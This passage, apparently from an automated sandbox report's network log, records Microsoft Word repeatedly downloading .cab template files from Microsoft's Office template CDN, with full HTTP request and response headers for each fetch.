    Connection: Keep-Alive
    Accept-Encoding: gzip
    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; Microsoft Word 16.0.12527; Pro)
    X-IDCRL_ACCEPTED: t
    X-Office-Version: 16.0.12527
    X-Office-Application: 0
    X-Office-Platform: Win32
    X-Office-AudienceGroup: Production
    X-Office-SessionId: 004D04D9-95E8-4E84-8D4A-7D8AB8763F90
    Host: binaries.templates.cdn.office.net
    Response
    HTTP/1.1 200 OK
    Content-Length: 31605
    Content-Type: application/vnd.ms-cab-compressed
    Content-MD5: ae2zv4HJn+ipS7oDQIxa4Q==
    Last-Modified: Fri, 22 Apr 2016 16:09:39 GMT
    ETag: 0x8D36AC8822FFB6E
    Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
    x-ms-request-id: cb58b91a-201e-00f4-4797-a041dc000000
    x-ms-version: 2009-09-19
    x-ms-lease-status: unlocked
    x-ms-blob-type: BlockBlob
    Date: Mon, 20 May 2024 12:37:56 GMT
    Connection: keep-alive
    Access-Control-Allow-Headers: *
    Vary: Origin
    Access-Control-Allow-Credentials: true
    Access-Control-Allow-Methods: GET,POST,OPTIONS
    Access-Control-Allow-Origin: *
  • flag-us
    GET
    https://binaries.templates.cdn.office.net/support/templates/en-us/tp1000111403.cab
    WINWORD.EXE
    Remote address:
    2.17.251.23:443
    Request
    GET /support/templates/en-us/tp1000111403.cab HTTP/1.1
    Connection: Keep-Alive
    Accept-Encoding: gzip
    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; Microsoft Word 16.0.12527; Pro)
    X-IDCRL_ACCEPTED: t
    X-Office-Version: 16.0.12527
    X-Office-Application: 0
    X-Office-Platform: Win32
    X-Office-AudienceGroup: Production
    X-Office-SessionId: 004D04D9-95E8-4E84-8D4A-7D8AB8763F90
    Host: binaries.templates.cdn.office.net
    Response
    HTTP/1.1 200 OK
    Content-Length: 953453
    Content-Type: application/vnd.ms-cab-compressed
    Content-MD5: 1OrACenntkuLABroK4EC+g==
    Last-Modified: Thu, 12 Jul 2018 00:20:10 GMT
    ETag: 0x8D5E78D3A9D8C97
    Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
    x-ms-request-id: faf4e13b-801e-0036-5697-a0075a000000
    x-ms-version: 2009-09-19
    x-ms-lease-status: unlocked
    x-ms-blob-type: BlockBlob
    Date: Mon, 20 May 2024 12:37:56 GMT
    Connection: keep-alive
    Access-Control-Allow-Headers: *
    Vary: Origin
    Access-Control-Allow-Credentials: true
    Access-Control-Allow-Methods: GET,POST,OPTIONS
    Access-Control-Allow-Origin: *
  • flag-us
    GET
    https://binaries.templates.cdn.office.net/support/templates/en-us/tp02851221.cab
    WINWORD.EXE
    Remote address:
    2.17.251.23:443
    Request
    GET /support/templates/en-us/tp02851221.cab HTTP/1.1
    Connection: Keep-Alive
    Accept-Encoding: gzip
    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; Microsoft Word 16.0.12527; Pro)
    X-IDCRL_ACCEPTED: t
    X-Office-Version: 16.0.12527
    X-Office-Application: 0
    X-Office-Platform: Win32
    X-Office-AudienceGroup: Production
    X-Office-SessionId: 004D04D9-95E8-4E84-8D4A-7D8AB8763F90
    Host: binaries.templates.cdn.office.net
    Response
    HTTP/1.1 200 OK
    Content-Length: 31562
    Content-Type: application/vnd.ms-cab-compressed
    Content-MD5: HW+Oc6BmKkjTMgkKTIyJjw==
    Last-Modified: Fri, 22 Apr 2016 15:41:41 GMT
    ETag: 0x8D36AC499FED5FF
    Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
    x-ms-request-id: dacba60e-401e-0105-7097-a08a43000000
    x-ms-version: 2009-09-19
    x-ms-lease-status: unlocked
    x-ms-blob-type: BlockBlob
    Date: Mon, 20 May 2024 12:37:56 GMT
    Connection: keep-alive
    Access-Control-Allow-Headers: *
    Vary: Origin
    Access-Control-Allow-Credentials: true
    Access-Control-Allow-Methods: GET,POST,OPTIONS
    Access-Control-Allow-Origin: *
  • flag-us
    GET
    https://binaries.templates.cdn.office.net/support/templates/en-us/tp0403393701.cab
    WINWORD.EXE
    Remote address:
    2.17.251.23:443
    Request
    GET /support/templates/en-us/tp0403393701.cab HTTP/1.1
    Connection: Keep-Alive
    Accept-Encoding: gzip
    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; Microsoft Word 16.0.12527; Pro)
    X-IDCRL_ACCEPTED: t
    X-Office-Version: 16.0.12527
    X-Office-Application: 0
    X-Office-Platform: Win32
    X-Office-AudienceGroup: Production
    X-Office-SessionId: 004D04D9-95E8-4E84-8D4A-7D8AB8763F90
    Host: binaries.templates.cdn.office.net
    Response
    HTTP/1.1 200 OK
    Content-Length: 3256855
    Content-Type: application/vnd.ms-cab-compressed
    Content-MD5: iGe99fx1Tanab1ujQTNFlQ==
    Last-Modified: Wed, 29 Aug 2018 18:19:39 GMT
    ETag: 0x8D60DDBFC361FBC
    Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
    x-ms-request-id: a1f8b712-201e-001a-6997-a01706000000
    x-ms-version: 2009-09-19
    x-ms-lease-status: unlocked
    x-ms-blob-type: BlockBlob
    Date: Mon, 20 May 2024 12:37:56 GMT
    Connection: keep-alive
    Access-Control-Allow-Headers: *
    Vary: Origin
    Access-Control-Allow-Credentials: true
    Access-Control-Allow-Methods: GET,POST,OPTIONS
    Access-Control-Allow-Origin: *
  • flag-us
    GET
    https://binaries.templates.cdn.office.net/support/templates/en-us/tp03328884.cab
    WINWORD.EXE
    Remote address:
    2.17.251.23:443
    Request
    GET /support/templates/en-us/tp03328884.cab HTTP/1.1
    Connection: Keep-Alive
    Accept-Encoding: gzip
    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; Microsoft Word 16.0.12527; Pro)
    X-IDCRL_ACCEPTED: t
    X-Office-Version: 16.0.12527
    X-Office-Application: 0
    X-Office-Platform: Win32
    X-Office-AudienceGroup: Production
    X-Office-SessionId: 004D04D9-95E8-4E84-8D4A-7D8AB8763F90
    Host: binaries.templates.cdn.office.net
    Response
    HTTP/1.1 200 OK
    Content-Length: 22008
    Content-Type: application/vnd.ms-cab-compressed
    Content-MD5: q78QzulIDkHYEnfpU4+Yyw==
    Last-Modified: Fri, 22 Apr 2016 15:41:56 GMT
    ETag: 0x8D36AC4A2F6A8CC
    Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
    x-ms-request-id: ff55c4dd-c01e-0039-0797-a078cd000000
    x-ms-version: 2009-09-19
    x-ms-lease-status: unlocked
    x-ms-blob-type: BlockBlob
    Date: Mon, 20 May 2024 12:37:56 GMT
    Connection: keep-alive
    Access-Control-Allow-Headers: *
    Vary: Origin
    Access-Control-Allow-Credentials: true
    Access-Control-Allow-Methods: GET,POST,OPTIONS
    Access-Control-Allow-Origin: *
  • flag-us
    GET
    https://binaries.templates.cdn.office.net/support/templates/en-us/tp02851217.cab
    WINWORD.EXE
    Remote address:
    2.17.251.23:443
    Request
    GET /support/templates/en-us/tp02851217.cab HTTP/1.1
    Connection: Keep-Alive
    Accept-Encoding: gzip
    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; Microsoft Word 16.0.12527; Pro)
    X-IDCRL_ACCEPTED: t
    X-Office-Version: 16.0.12527
    X-Office-Application: 0
    X-Office-Platform: Win32
    X-Office-AudienceGroup: Production
    X-Office-SessionId: 004D04D9-95E8-4E84-8D4A-7D8AB8763F90
    Host: binaries.templates.cdn.office.net
    Response
    HTTP/1.1 200 OK
    Content-Length: 33610
    Content-Type: application/vnd.ms-cab-compressed
    Content-MD5: UYBOJVxXMXYDn01bVcEqsg==
    Last-Modified: Fri, 22 Apr 2016 16:09:38 GMT
    ETag: 0x8D36AC881987151
    Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
    x-ms-request-id: 5c89f3d8-e01e-00a6-4d97-a03d34000000
    x-ms-version: 2009-09-19
    x-ms-lease-status: unlocked
    x-ms-blob-type: BlockBlob
    Date: Mon, 20 May 2024 12:37:56 GMT
    Connection: keep-alive
    Access-Control-Allow-Headers: *
    Vary: Origin
    Access-Control-Allow-Credentials: true
    Access-Control-Allow-Methods: GET,POST,OPTIONS
    Access-Control-Allow-Origin: *
  • flag-us
    GET
    https://binaries.templates.cdn.office.net/support/templates/en-us/tp02851222.cab
    WINWORD.EXE
    Remote address:
    2.17.251.23:443
    Request
    GET /support/templates/en-us/tp02851222.cab HTTP/1.1
    Connection: Keep-Alive
    Accept-Encoding: gzip
    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; Microsoft Word 16.0.12527; Pro)
    X-IDCRL_ACCEPTED: t
    X-Office-Version: 16.0.12527
    X-Office-Application: 0
    X-Office-Platform: Win32
    X-Office-AudienceGroup: Production
    X-Office-SessionId: 004D04D9-95E8-4E84-8D4A-7D8AB8763F90
    Host: binaries.templates.cdn.office.net
    Response
    HTTP/1.1 200 OK
    Content-Length: 28911
    Content-Type: application/vnd.ms-cab-compressed
    Content-MD5: bXh7HiI9trkbaSOAYsyocg==
    Last-Modified: Fri, 22 Apr 2016 16:09:41 GMT
    ETag: 0x8D36AC8830E54C8
    Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
    x-ms-request-id: a51313b9-e01e-0100-5597-a07427000000
    x-ms-version: 2009-09-19
    x-ms-lease-status: unlocked
    x-ms-blob-type: BlockBlob
    Date: Mon, 20 May 2024 12:37:56 GMT
    Connection: keep-alive
    Access-Control-Allow-Headers: *
    Vary: Origin
    Access-Control-Allow-Credentials: true
    Access-Control-Allow-Methods: GET,POST,OPTIONS
    Access-Control-Allow-Origin: *
  • flag-us
    GET
    https://binaries.templates.cdn.office.net/support/templates/en-us/tp02851218.cab
    WINWORD.EXE
    Remote address:
    2.17.251.23:443
    Request
    GET /support/templates/en-us/tp02851218.cab HTTP/1.1
    Connection: Keep-Alive
    Accept-Encoding: gzip
    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; Microsoft Word 16.0.12527; Pro)
    X-IDCRL_ACCEPTED: t
    X-Office-Version: 16.0.12527
    X-Office-Application: 0
    X-Office-Platform: Win32
    X-Office-AudienceGroup: Production
    X-Office-SessionId: 004D04D9-95E8-4E84-8D4A-7D8AB8763F90
    Host: binaries.templates.cdn.office.net
    Response
    HTTP/1.1 200 OK
    Content-Length: 31835
    Content-Type: application/vnd.ms-cab-compressed
    Content-MD5: kqgZ1DSoquosZfDMLzO7Og==
    Last-Modified: Fri, 22 Apr 2016 15:41:41 GMT
    ETag: 0x8D36AC4998BC504
    Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
    x-ms-request-id: 76eac56c-801e-00f9-0d97-a0f289000000
    x-ms-version: 2009-09-19
    x-ms-lease-status: unlocked
    x-ms-blob-type: BlockBlob
    Date: Mon, 20 May 2024 12:37:56 GMT
    Connection: keep-alive
    Access-Control-Allow-Headers: *
    Vary: Origin
    Access-Control-Allow-Credentials: true
    Access-Control-Allow-Methods: GET,POST,OPTIONS
    Access-Control-Allow-Origin: *
  • flag-us
    GET
    https://binaries.templates.cdn.office.net/support/templates/en-us/tp1000111502.cab
    WINWORD.EXE
    Remote address:
    2.17.251.23:443
    Request
    GET /support/templates/en-us/tp1000111502.cab HTTP/1.1
    Connection: Keep-Alive
    Accept-Encoding: gzip
    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; Microsoft Word 16.0.12527; Pro)
    X-IDCRL_ACCEPTED: t
    X-Office-Version: 16.0.12527
    X-Office-Application: 0
    X-Office-Platform: Win32
    X-Office-AudienceGroup: Production
    X-Office-SessionId: 004D04D9-95E8-4E84-8D4A-7D8AB8763F90
    Host: binaries.templates.cdn.office.net
    Response
    HTTP/1.1 200 OK
    Content-Length: 230916
    Content-Type: application/vnd.ms-cab-compressed
    Content-MD5: k/qfd5Ugqy0irE6oZLe7NA==
    Last-Modified: Thu, 12 Jul 2018 00:23:55 GMT
    ETag: 0x8D5E78DC0BDFFD8
    Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
    x-ms-request-id: 4fca6d0a-e01e-006a-5297-a064c2000000
    x-ms-version: 2009-09-19
    x-ms-lease-status: unlocked
    x-ms-blob-type: BlockBlob
    Date: Mon, 20 May 2024 12:37:56 GMT
    Connection: keep-alive
    Access-Control-Allow-Headers: *
    Vary: Origin
    Access-Control-Allow-Credentials: true
    Access-Control-Allow-Methods: GET,POST,OPTIONS
    Access-Control-Allow-Origin: *
  • flag-us
    GET
    https://binaries.templates.cdn.office.net/support/templates/en-us/tp02851224.cab
    WINWORD.EXE
    Remote address:
    2.17.251.23:443
    Request
    GET /support/templates/en-us/tp02851224.cab HTTP/1.1
    Connection: Keep-Alive
    Accept-Encoding: gzip
    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; Microsoft Word 16.0.12527; Pro)
    X-IDCRL_ACCEPTED: t
    X-Office-Version: 16.0.12527
    X-Office-Application: 0
    X-Office-Platform: Win32
    X-Office-AudienceGroup: Production
    X-Office-SessionId: 004D04D9-95E8-4E84-8D4A-7D8AB8763F90
    Host: binaries.templates.cdn.office.net
    Response
    HTTP/1.1 200 OK
    Content-Length: 30957
    Content-Type: application/vnd.ms-cab-compressed
    Content-MD5: 08kDbk4RWegysbTS6dQr8A==
    Last-Modified: Fri, 22 Apr 2016 15:41:42 GMT
    ETag: 0x8D36AC49A7FC9DF
    Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
    x-ms-request-id: 8e392da6-d01e-010b-4f97-a06648000000
    x-ms-version: 2009-09-19
    x-ms-lease-status: unlocked
    x-ms-blob-type: BlockBlob
    Date: Mon, 20 May 2024 12:37:56 GMT
    Connection: keep-alive
    Access-Control-Allow-Headers: *
    Vary: Origin
    Access-Control-Allow-Credentials: true
    Access-Control-Allow-Methods: GET,POST,OPTIONS
    Access-Control-Allow-Origin: *
  • flag-us
    GET
    https://binaries.templates.cdn.office.net/support/templates/en-us/tp0345751501.cab
    WINWORD.EXE
    Remote address:
    2.17.251.23:443
    Request
    GET /support/templates/en-us/tp0345751501.cab HTTP/1.1
    Connection: Keep-Alive
    Accept-Encoding: gzip
    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; Microsoft Word 16.0.12527; Pro)
    X-IDCRL_ACCEPTED: t
    X-Office-Version: 16.0.12527
    X-Office-Application: 0
    X-Office-Platform: Win32
    X-Office-AudienceGroup: Production
    X-Office-SessionId: 004D04D9-95E8-4E84-8D4A-7D8AB8763F90
    Host: binaries.templates.cdn.office.net
    Response
    HTTP/1.1 200 OK
    Content-Length: 222992
    Content-Type: application/vnd.ms-cab-compressed
    Content-MD5: Jr6rnM6v5Pvwt8A2JoGp0g==
    Last-Modified: Wed, 29 Aug 2018 18:20:49 GMT
    ETag: 0x8D60DDC25D3B258
    Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
    x-ms-request-id: 2dfc7fe2-b01e-0132-7897-a026ec000000
    x-ms-version: 2009-09-19
    x-ms-lease-status: unlocked
    x-ms-blob-type: BlockBlob
    Date: Mon, 20 May 2024 12:37:56 GMT
    Connection: keep-alive
    Access-Control-Allow-Headers: *
    Vary: Origin
    Access-Control-Allow-Credentials: true
    Access-Control-Allow-Methods: GET,POST,OPTIONS
    Access-Control-Allow-Origin: *
  • flag-us
    GET
    https://binaries.templates.cdn.office.net/support/templates/en-us/tp02851223.cab
    WINWORD.EXE
    Remote address:
    2.17.251.23:443
    Request
    GET /support/templates/en-us/tp02851223.cab HTTP/1.1
    Connection: Keep-Alive
    Accept-Encoding: gzip
    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; Microsoft Word 16.0.12527; Pro)
    X-IDCRL_ACCEPTED: t
    X-Office-Version: 16.0.12527
    X-Office-Application: 0
    X-Office-Platform: Win32
    X-Office-AudienceGroup: Production
    X-Office-SessionId: 004D04D9-95E8-4E84-8D4A-7D8AB8763F90
    Host: binaries.templates.cdn.office.net
    Response
    HTTP/1.1 200 OK
    Content-Length: 32833
    Content-Type: application/vnd.ms-cab-compressed
    Content-MD5: IFr1FgTvlu8ejmAhJUH3Qg==
    Last-Modified: Fri, 22 Apr 2016 15:41:42 GMT
    ETag: 0x8D36AC49A4270D3
    Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
    x-ms-request-id: a445c8ca-501e-00f0-1697-a0e807000000
    x-ms-version: 2009-09-19
    x-ms-lease-status: unlocked
    x-ms-blob-type: BlockBlob
    Date: Mon, 20 May 2024 12:37:56 GMT
    Connection: keep-alive
    Access-Control-Allow-Headers: *
    Vary: Origin
    Access-Control-Allow-Credentials: true
    Access-Control-Allow-Methods: GET,POST,OPTIONS
    Access-Control-Allow-Origin: *
  • flag-us
    GET
    https://binaries.templates.cdn.office.net/support/templates/en-us/tp02851226.cab
    WINWORD.EXE
    Remote address:
    2.17.251.23:443
    Request
    GET /support/templates/en-us/tp02851226.cab HTTP/1.1
    Connection: Keep-Alive
    Accept-Encoding: gzip
    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; Microsoft Word 16.0.12527; Pro)
    X-IDCRL_ACCEPTED: t
    X-Office-Version: 16.0.12527
    X-Office-Application: 0
    X-Office-Platform: Win32
    X-Office-AudienceGroup: Production
    X-Office-SessionId: 004D04D9-95E8-4E84-8D4A-7D8AB8763F90
    Host: binaries.templates.cdn.office.net
    Response
    HTTP/1.1 200 OK
    Content-Length: 35519
    Content-Type: application/vnd.ms-cab-compressed
    Content-MD5: U+6dpJ0LhDVwOOzzdoONLg==
    Last-Modified: Fri, 22 Apr 2016 16:09:43 GMT
    ETag: 0x8D36AC88440C433
    Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
    x-ms-request-id: 2e8ae1bb-901e-00ce-4f97-a05ba4000000
    x-ms-version: 2009-09-19
    x-ms-lease-status: unlocked
    x-ms-blob-type: BlockBlob
    Date: Mon, 20 May 2024 12:37:56 GMT
    Connection: keep-alive
    Access-Control-Allow-Headers: *
    Vary: Origin
    Access-Control-Allow-Credentials: true
    Access-Control-Allow-Methods: GET,POST,OPTIONS
    Access-Control-Allow-Origin: *
  • flag-us
    GET
    https://binaries.templates.cdn.office.net/support/templates/en-us/tp02851225.cab
    WINWORD.EXE
    Remote address:
    2.17.251.23:443
    Request
    GET /support/templates/en-us/tp02851225.cab HTTP/1.1
    Connection: Keep-Alive
    Accept-Encoding: gzip
    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; Microsoft Word 16.0.12527; Pro)
    X-IDCRL_ACCEPTED: t
    X-Office-Version: 16.0.12527
    X-Office-Application: 0
    X-Office-Platform: Win32
    X-Office-AudienceGroup: Production
    X-Office-SessionId: 004D04D9-95E8-4E84-8D4A-7D8AB8763F90
    Host: binaries.templates.cdn.office.net
    Response
    HTTP/1.1 200 OK
    Content-Length: 31008
    Content-Type: application/vnd.ms-cab-compressed
    Content-MD5: 4DPMvHunh6L4JM4JUuV9RA==
    Last-Modified: Fri, 22 Apr 2016 16:09:42 GMT
    ETag: 0x8D36AC883F49D7D
    Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
    x-ms-request-id: 333d895c-301e-008a-7b97-a0d19b000000
    x-ms-version: 2009-09-19
    x-ms-lease-status: unlocked
    x-ms-blob-type: BlockBlob
    Date: Mon, 20 May 2024 12:37:56 GMT
    Connection: keep-alive
    Access-Control-Allow-Headers: *
    Vary: Origin
    Access-Control-Allow-Credentials: true
    Access-Control-Allow-Methods: GET,POST,OPTIONS
    Access-Control-Allow-Origin: *
  • flag-us
    GET
    https://binaries.templates.cdn.office.net/support/templates/en-us/tp02851227.cab
    WINWORD.EXE
    Remote address:
    2.17.251.23:443
    Request
    GET /support/templates/en-us/tp02851227.cab HTTP/1.1
    Connection: Keep-Alive
    Accept-Encoding: gzip
    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; Microsoft Word 16.0.12527; Pro)
    X-IDCRL_ACCEPTED: t
    X-Office-Version: 16.0.12527
    X-Office-Application: 0
    X-Office-Platform: Win32
    X-Office-AudienceGroup: Production
    X-Office-SessionId: 004D04D9-95E8-4E84-8D4A-7D8AB8763F90
    Host: binaries.templates.cdn.office.net
    Response
    HTTP/1.1 200 OK
    Content-Length: 31471
    Content-Type: application/vnd.ms-cab-compressed
    Content-MD5: karb7EFxz6gpK2GEkvXvNA==
    Last-Modified: Fri, 22 Apr 2016 16:09:43 GMT
    ETag: 0x8D36AC8848A0495
    Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
    x-ms-request-id: 13033484-101e-00ef-6b97-a07fdf000000
    x-ms-version: 2009-09-19
    x-ms-lease-status: unlocked
    x-ms-blob-type: BlockBlob
    Date: Mon, 20 May 2024 12:37:56 GMT
    Connection: keep-alive
    Access-Control-Allow-Headers: *
    Vary: Origin
    Access-Control-Allow-Credentials: true
    Access-Control-Allow-Methods: GET,POST,OPTIONS
    Access-Control-Allow-Origin: *
  • flag-us
    GET
    https://binaries.templates.cdn.office.net/support/templates/en-us/tp0309043001.cab
    WINWORD.EXE
    Remote address:
    2.17.251.23:443
    Request
    GET /support/templates/en-us/tp0309043001.cab HTTP/1.1
    Connection: Keep-Alive
    Accept-Encoding: gzip
    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; Microsoft Word 16.0.12527; Pro)
    X-IDCRL_ACCEPTED: t
    X-Office-Version: 16.0.12527
    X-Office-Application: 0
    X-Office-Platform: Win32
    X-Office-AudienceGroup: Production
    X-Office-SessionId: 004D04D9-95E8-4E84-8D4A-7D8AB8763F90
    Host: binaries.templates.cdn.office.net
    Response
    HTTP/1.1 200 OK
    Content-Length: 307348
    Content-Type: application/vnd.ms-cab-compressed
    Content-MD5: DrxFqg5nzENdB0VDg3H5SA==
    Last-Modified: Wed, 29 Aug 2018 18:20:24 GMT
    ETag: 0x8D60DDC16D93762
    Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
    x-ms-request-id: 6b95f26a-601e-0143-7d97-a0927b000000
    x-ms-version: 2009-09-19
    x-ms-lease-status: unlocked
    x-ms-blob-type: BlockBlob
    Date: Mon, 20 May 2024 12:37:56 GMT
    Connection: keep-alive
    Access-Control-Allow-Headers: *
    Vary: Origin
    Access-Control-Allow-Credentials: true
    Access-Control-Allow-Methods: GET,POST,OPTIONS
    Access-Control-Allow-Origin: *
  • flag-us
    GET
    https://binaries.templates.cdn.office.net/support/templates/en-us/tp02835233.cab
    WINWORD.EXE
    Remote address:
    2.17.251.23:443
    Request
    GET /support/templates/en-us/tp02835233.cab HTTP/1.1
    Connection: Keep-Alive
    Accept-Encoding: gzip
    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; Microsoft Word 16.0.12527; Pro)
    X-IDCRL_ACCEPTED: t
    X-Office-Version: 16.0.12527
    X-Office-Application: 0
    X-Office-Platform: Win32
    X-Office-AudienceGroup: Production
    X-Office-SessionId: 004D04D9-95E8-4E84-8D4A-7D8AB8763F90
    Host: binaries.templates.cdn.office.net
    Response
    HTTP/1.1 200 OK
    Content-Length: 46413
    Content-Type: application/vnd.ms-cab-compressed
    Content-MD5: xFXEvEvsng2mfE0eU+RtWg==
    Last-Modified: Fri, 22 Apr 2016 15:41:34 GMT
    ETag: 0x8D36AC4959B7E4C
    Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
    x-ms-request-id: 2ef43144-a01e-0126-5097-a0e588000000
    x-ms-version: 2009-09-19
    x-ms-lease-status: unlocked
    x-ms-blob-type: BlockBlob
    Date: Mon, 20 May 2024 12:37:56 GMT
    Connection: keep-alive
    Access-Control-Allow-Headers: *
    Vary: Origin
    Access-Control-Allow-Credentials: true
    Access-Control-Allow-Methods: GET,POST,OPTIONS
    Access-Control-Allow-Origin: *
  • flag-us
    GET
    https://binaries.templates.cdn.office.net/support/templates/en-us/tp0345751001.cab
    WINWORD.EXE
    Remote address:
    2.17.251.23:443
    Request
    GET /support/templates/en-us/tp0345751001.cab HTTP/1.1
    Connection: Keep-Alive
    Accept-Encoding: gzip
    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; Microsoft Word 16.0.12527; Pro)
    X-IDCRL_ACCEPTED: t
    X-Office-Version: 16.0.12527
    X-Office-Application: 0
    X-Office-Platform: Win32
    X-Office-AudienceGroup: Production
    X-Office-SessionId: 004D04D9-95E8-4E84-8D4A-7D8AB8763F90
    Host: binaries.templates.cdn.office.net
    Response
    HTTP/1.1 200 OK
    Content-Length: 1065873
    Content-Type: application/vnd.ms-cab-compressed
    Content-MD5: 4RAcym4/7bKLV69MQbUNNw==
    Last-Modified: Wed, 29 Aug 2018 18:15:37 GMT
    ETag: 0x8D60DDB6BA6E455
    Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
    x-ms-request-id: 035d76e5-001e-0155-6297-a064ac000000
    x-ms-version: 2009-09-19
    x-ms-lease-status: unlocked
    x-ms-blob-type: BlockBlob
    Date: Mon, 20 May 2024 12:37:56 GMT
    Connection: keep-alive
    Access-Control-Allow-Headers: *
    Vary: Origin
    Access-Control-Allow-Credentials: true
    Access-Control-Allow-Methods: GET,POST,OPTIONS
    Access-Control-Allow-Origin: *
  • flag-us
    GET
    https://binaries.templates.cdn.office.net/support/templates/en-us/tp0309043402.cab
    WINWORD.EXE
    Remote address:
    2.17.251.23:443
    Request
    GET /support/templates/en-us/tp0309043402.cab HTTP/1.1
    Connection: Keep-Alive
    Accept-Encoding: gzip
    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; Microsoft Word 16.0.12527; Pro)
    X-IDCRL_ACCEPTED: t
    X-Office-Version: 16.0.12527
    X-Office-Application: 0
    X-Office-Platform: Win32
    X-Office-AudienceGroup: Production
    X-Office-SessionId: 004D04D9-95E8-4E84-8D4A-7D8AB8763F90
    Host: binaries.templates.cdn.office.net
    Response
    HTTP/1.1 200 OK
    Content-Length: 723359
    Content-Type: application/vnd.ms-cab-compressed
    Content-MD5: dIpTxr3Vzpe9VKdsejNChg==
    Last-Modified: Wed, 29 Aug 2018 18:14:28 GMT
    ETag: 0x8D60DDB424DEB76
    Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
    x-ms-request-id: 6df36025-a01e-0066-4397-a08a33000000
    x-ms-version: 2009-09-19
    x-ms-lease-status: unlocked
    x-ms-blob-type: BlockBlob
    Date: Mon, 20 May 2024 12:37:56 GMT
    Connection: keep-alive
    Access-Control-Allow-Headers: *
    Vary: Origin
    Access-Control-Allow-Credentials: true
    Access-Control-Allow-Methods: GET,POST,OPTIONS
    Access-Control-Allow-Origin: *
  • flag-us
    GET
    https://binaries.templates.cdn.office.net/support/templates/en-us/tp03328905.cab
    WINWORD.EXE
    Remote address:
    2.17.251.23:443
    Request
    GET /support/templates/en-us/tp03328905.cab HTTP/1.1
    Connection: Keep-Alive
    Accept-Encoding: gzip
    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; Microsoft Word 16.0.12527; Pro)
    X-IDCRL_ACCEPTED: t
    X-Office-Version: 16.0.12527
    X-Office-Application: 0
    X-Office-Platform: Win32
    X-Office-AudienceGroup: Production
    X-Office-SessionId: 004D04D9-95E8-4E84-8D4A-7D8AB8763F90
    Host: binaries.templates.cdn.office.net
    Response
    HTTP/1.1 200 OK
    Content-Length: 20457
    Content-Type: application/vnd.ms-cab-compressed
    Content-MD5: TvpI7DB+ry+bNGoHPGf8+w==
    Last-Modified: Fri, 22 Apr 2016 16:09:46 GMT
    ETag: 0x8D36AC886167DDF
    Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
    x-ms-request-id: 66a5b05a-401e-0074-0597-a0beda000000
    x-ms-version: 2009-09-19
    x-ms-lease-status: unlocked
    x-ms-blob-type: BlockBlob
    Date: Mon, 20 May 2024 12:37:56 GMT
    Connection: keep-alive
    Access-Control-Allow-Headers: *
    Vary: Origin
    Access-Control-Allow-Credentials: true
    Access-Control-Allow-Methods: GET,POST,OPTIONS
    Access-Control-Allow-Origin: *
  • flag-us
    GET
    https://binaries.templates.cdn.office.net/support/templates/en-us/tp0403392901.cab
    WINWORD.EXE
    Remote address:
    2.17.251.23:443
    Request
    GET /support/templates/en-us/tp0403392901.cab HTTP/1.1
    Connection: Keep-Alive
    Accept-Encoding: gzip
    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; Microsoft Word 16.0.12527; Pro)
    X-IDCRL_ACCEPTED: t
    X-Office-Version: 16.0.12527
    X-Office-Application: 0
    X-Office-Platform: Win32
    X-Office-AudienceGroup: Production
    X-Office-SessionId: 004D04D9-95E8-4E84-8D4A-7D8AB8763F90
    Host: binaries.templates.cdn.office.net
    Response
    HTTP/1.1 200 OK
    Content-Length: 1766185
    Content-Type: application/vnd.ms-cab-compressed
    Content-MD5: go+WAx9Av468teUqrut+TA==
    Last-Modified: Wed, 29 Aug 2018 18:21:39 GMT
    ETag: 0x8D60DDC4354B7FB
    Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
    x-ms-request-id: ec9a4660-301e-00c7-1297-a01e77000000
    x-ms-version: 2009-09-19
    x-ms-lease-status: unlocked
    x-ms-blob-type: BlockBlob
    Date: Mon, 20 May 2024 12:37:56 GMT
    Connection: keep-alive
    Access-Control-Allow-Headers: *
    Vary: Origin
    Access-Control-Allow-Credentials: true
    Access-Control-Allow-Methods: GET,POST,OPTIONS
    Access-Control-Allow-Origin: *
  • flag-us
    GET
    https://binaries.templates.cdn.office.net/support/templates/en-us/tp03328893.cab
    WINWORD.EXE
    Remote address:
    2.17.251.23:443
    Request
    GET /support/templates/en-us/tp03328893.cab HTTP/1.1
    Connection: Keep-Alive
    Accept-Encoding: gzip
